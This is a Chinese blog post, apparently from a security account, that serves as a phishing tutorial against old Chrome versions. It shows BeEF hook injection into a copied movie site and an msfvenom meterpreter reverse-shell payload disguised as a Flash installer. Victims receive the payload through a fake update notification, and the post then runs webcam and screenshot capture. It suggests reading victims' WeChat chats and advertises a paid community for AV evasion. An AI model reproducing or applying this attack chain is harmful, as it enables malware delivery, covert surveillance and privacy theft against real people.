由于本文的特殊性和敏感性,怕某些读者作恶,故本篇采用简单且"落后"的手法.
本文环境全程在本地搭建,kali的ip为192.168.233.131
实现条件是chrome版本低于20,也就是2013之前的版本,附上旧版本下载地址(过于落后,可以展示)
https://www.googleapis.com/download/storage/v1/b/chromium-browser-snapshots/o/Win%2F101600%2Fchrome-win32.zip?generation=1&alt=media
安装beef
docker pull janes/beef
docker run -p 3000:3000 janes/beef
然后访问web
http://192.168.233.131:3000/ui/panel
账号密码都是beef
点击hook me
获取钓⻥⻚⾯,我找了个盗版电影网站
wget https://电影网/ -O index.htm
把js插进去
<script src='http://192.168.233.131:3000/hook.js'></script>
然后把index.html放⼊docker⾥
docker cp index.html id:/opt/beef/extensions/demos/html
msfvenom使用
本来是不想讲msfvenom是什么的,又怕小白不知道,那就浪费我几分钟说一下吧
MSFvenom是Msfpayload和Msfencode的组合,用于生成各种类型的恶意软件,下面是使用教程,kali自带,就不说怎么安装了
初始化和通过msfconsole进入Metasploit
msfdb init
msfconsole
使用exploit模块并设置攻击载荷
use exploit/multi/handler
set lhost 攻击机ip
exploit开始监听
生成马子诱导上线
然后去flash官网下载一个flash.exe(下载的exe重命名为flash.exe)
再生成一个新的马子(这里本来是想生成flash_install.exe的,结果手打快了,少了个a,后面都是用的少a版本,读者别被这个误导了)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=port -e
x86/shikata_ga_nai -x flash.exe -i 5 -f exe -o flash_instll.exe
把生成的马子放dokcer里
docker cp flashcenter_px_install.exe id:/opt/beef/extensions/demos/html/flash_instll.exe
受害者访问
http://192.168.233.131:3000/demos/index.html
可以看到有受害者上线了
选择commands,搜索fake,使⽤ fake notification bar ,URL填要马子地址,notification 填警告信息
马子路径
http://192.168.233.131:3000/demos/flash_instll.exe
message:自由发挥,我直接写的中文
然后受害者的旧chrome浏览器就会出现一条提示更新flash的消息
下载以后,就上线了
小窥一下受害者的隐私
拍个照片一睹受害者芳容
webcam_snap
然后截个图,看看他在看什么
screenshot
哈哈,原来我在听千里之外
麋鹿为了被拍照,早就把摄像头物理隔离了
开始后渗透
开启远程xx
下载并连接某xx软件
隐藏xx
ok,下面你就可以畅游受害者电脑了,比如把wx裤子脱了看看他每天和谁聊天聊什么,亦或者看看浏览器的记录,这里放一张本人的浏览器数据
对了,读者现在应该比较好奇为什么这里没有详细教程和配图,因为我前面说了,怕读者作恶,所以这里不讲啦,不过后续应该还是有机会能给大家介绍其他钓鱼手法的,到时候我会详细介绍如何拖微信库
鉴于本人能力有限,文中难免有不足之处,欢迎各位读者以及同仁添加本人微信给予批评指正.
★
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
加入安全交流群
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读